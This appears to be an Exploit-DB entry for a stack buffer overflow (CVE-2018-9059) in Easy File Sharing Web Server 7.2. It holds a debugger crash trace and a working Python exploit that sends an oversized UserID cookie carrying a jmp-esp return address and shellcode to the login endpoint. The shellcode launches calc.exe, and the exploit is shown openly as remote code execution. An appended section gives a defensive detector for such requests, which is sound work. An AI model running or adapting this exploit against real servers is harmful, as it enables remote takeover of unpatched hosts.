Easy File Sharing Web Server 7.2 – Stack Buffer Overflow

  • Author: rebeyond
    Date: 2018-04-18
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/44485/
  • # Exploit Title: Easy File Sharing Web Server 7.2 stack buffer overflow
    # Date: 03/24/2018
    # Exploit Author: rebeyond - http://www.rebeyond.net
    # Vendor Homepage: http://www.sharing-file.com/
    # Software Link: http://www.sharing-file.com/efssetup.exe
    # Version: 7.2
    # CVE: CVE-2018-9059
    # Tested on: Windows XP Professional SP3
    #
    # Description:
    # Attackers just need to construct a malicious login request packet and send it to the server. The server can be pwned.
    #
    #
    # The stack trace is as follows:
    # (40d8.2980): Access violation - code c0000005 (first chance)
    # r
    # eax=41414141 ebx=00000001 ecx=ffffffff edx=08fb62a0 esi=08fb6280 edi=08fb62a0
    # eip=61c277f6 esp=08fb61fc ebp=08fb6214 iopl=0 nv up ei pl nz na pe nc
    # cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
    # *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll -
    # sqlite3!sqlite3_errcode+0x8e:
    # 61c277f6 81784c97a629a0  cmp dword ptr [eax+4Ch],0A029A697h ds:002b:4141418d=????????
    #
    # kb
    # ChildEBP RetAddr  Args to Child
    # WARNING: Stack unwind information not available. Following frames may be wrong.
    # 083b6214 61c6286c 00001183 0000115d 085c4d44 sqlite3!sqlite3_errcode+0x8e
    # *** WARNING: Unable to verify checksum for fsws.exe
    # *** ERROR: Module load completed but symbols could not be loaded for fsws.exe
    # 083b6254 004968f4 00000001 00000000 083b6280 sqlite3!sqlite3_declare_vtab+0x3282
    # 083b6274 004975a3 083b6298 00000000 083b75fc fsws+0x968f4
    # 00000000 00000000 00000000 00000000 00000000 fsws+0x975a3
    
    
    import requests
    host = '192.168.50.30'
    port = '80'
    
    buf = 'A' * 4071
    buf += '\x12\x45\xfa\x7f'  # jmp esp
    buf += 'A' * 12
    buf += '\xeb\x36'  # jmp 0x36
    buf += 'A' * 42
    buf += '\x60\x30\xc7\x61' * 2  # must be valid address
    buf += 'A' * 4
    #shellcode to execute calc.exe on remote server
    buf += "\xdb\xdc\xd9\x74\x24\xf4\x58\xbb\x24\xa7\x26\xec\x33"
    buf += "\xc9\xb1\x31\x31\x58\x18\x03\x58\x18\x83\xe8\xd8\x45"
    buf += "\xd3\x10\xc8\x08\x1c\xe9\x08\x6d\x94\x0c\x39\xad\xc2"
    buf += "\x45\x69\x1d\x80\x08\x85\xd6\xc4\xb8\x1e\x9a\xc0\xcf"
    buf += "\x97\x11\x37\xe1\x28\x09\x0b\x60\xaa\x50\x58\x42\x93"
    buf += "\x9a\xad\x83\xd4\xc7\x5c\xd1\x8d\x8c\xf3\xc6\xba\xd9"
    buf += "\xcf\x6d\xf0\xcc\x57\x91\x40\xee\x76\x04\xdb\xa9\x58"
    buf += "\xa6\x08\xc2\xd0\xb0\x4d\xef\xab\x4b\xa5\x9b\x2d\x9a"
    buf += "\xf4\x64\x81\xe3\x39\x97\xdb\x24\xfd\x48\xae\x5c\xfe"
    buf += "\xf5\xa9\x9a\x7d\x22\x3f\x39\x25\xa1\xe7\xe5\xd4\x66"
    buf += "\x71\x6d\xda\xc3\xf5\x29\xfe\xd2\xda\x41\xfa\x5f\xdd"
    buf += "\x85\x8b\x24\xfa\x01\xd0\xff\x63\x13\xbc\xae\x9c\x43"
    buf += "\x1f\x0e\x39\x0f\x8d\x5b\x30\x52\xdb\x9a\xc6\xe8\xa9"
    buf += "\x9d\xd8\xf2\x9d\xf5\xe9\x79\x72\x81\xf5\xab\x37\x7d"
    buf += "\xbc\xf6\x11\x16\x19\x63\x20\x7b\x9a\x59\x66\x82\x19"
    buf += "\x68\x16\x71\x01\x19\x13\x3d\x85\xf1\x69\x2e\x60\xf6"
    buf += "\xde\x4f\xa1\x95\x81\xc3\x29\x74\x24\x64\xcb\x88"
    
    cookies = dict(SESSIONID='6771', UserID=buf, PassWD='')
    data = dict(frmLogin='', frmUserName='', frmUserPass='', login='')
    requests.post('http://' + host + ':' + port + '/forum.ghp', cookies=cookies, data=data)
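The trigger described above is an oversized, binary UserID cookie in a POST to /forum.ghp. The following detection check, added here as an illustration and not part of the original advisory or the vendor's software, parses a raw HTTP request and flags that shape; the length threshold MAX_USERID_LEN and the sample requests are constructed assumptions for the example.

```python
import re

# Assumed threshold for illustration: the public PoC pads UserID with 4071
# bytes before the overwritten return address; legitimate values are short.
MAX_USERID_LEN = 512
TARGET_PATH = "/forum.ghp"


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, path, headers). Header names
    are lower-cased str; values stay bytes so binary payloads are not
    mangled by a decode step."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    method = parts[0].decode("latin-1")
    path = parts[1].decode("latin-1") if len(parts) > 1 else ""
    headers = {}
    for line in lines[1:]:
        if b":" in line:
            name, value = line.split(b":", 1)
            headers[name.strip().lower().decode("latin-1")] = value.strip()
    return method, path, headers


def parse_cookies(header: bytes) -> dict:
    """Parse 'k=v; k2=v2' into a dict of str -> bytes."""
    cookies = {}
    for part in header.split(b";"):
        if b"=" in part:
            k, v = part.strip().split(b"=", 1)
            cookies[k.decode("latin-1")] = v
    return cookies


def check_request(raw: bytes) -> list:
    """Return reasons this request looks like CVE-2018-9059 abuse (empty if none)."""
    _, path, headers = parse_request(raw)
    if path != TARGET_PATH:
        return []
    uid = parse_cookies(headers.get("cookie", b"")).get("UserID", b"")
    reasons = []
    if len(uid) > MAX_USERID_LEN:
        reasons.append(f"UserID cookie length {len(uid)} exceeds {MAX_USERID_LEN}")
    if re.search(rb"[^\x20-\x7e]", uid):
        reasons.append("UserID cookie contains non-printable bytes")
    return reasons


# Constructed samples: a benign login and one shaped like the PoC (padding plus
# a few non-printable bytes standing in for the overwritten return address).
BENIGN = b"POST /forum.ghp HTTP/1.1\r\nHost: x\r\nCookie: SESSIONID=6771; UserID=42; PassWD=\r\n\r\nfrmLogin="
SUSPECT = (b"POST /forum.ghp HTTP/1.1\r\nHost: x\r\nCookie: SESSIONID=6771; UserID="
           + b"A" * 4071 + b"\x12\x45\xfa\x7f" + b"; PassWD=\r\n\r\nfrmLogin=")
```

Run it over captured requests to the server (for example from a proxy or packet capture); a non-empty result is worth an alert even before the shellcode stage is present.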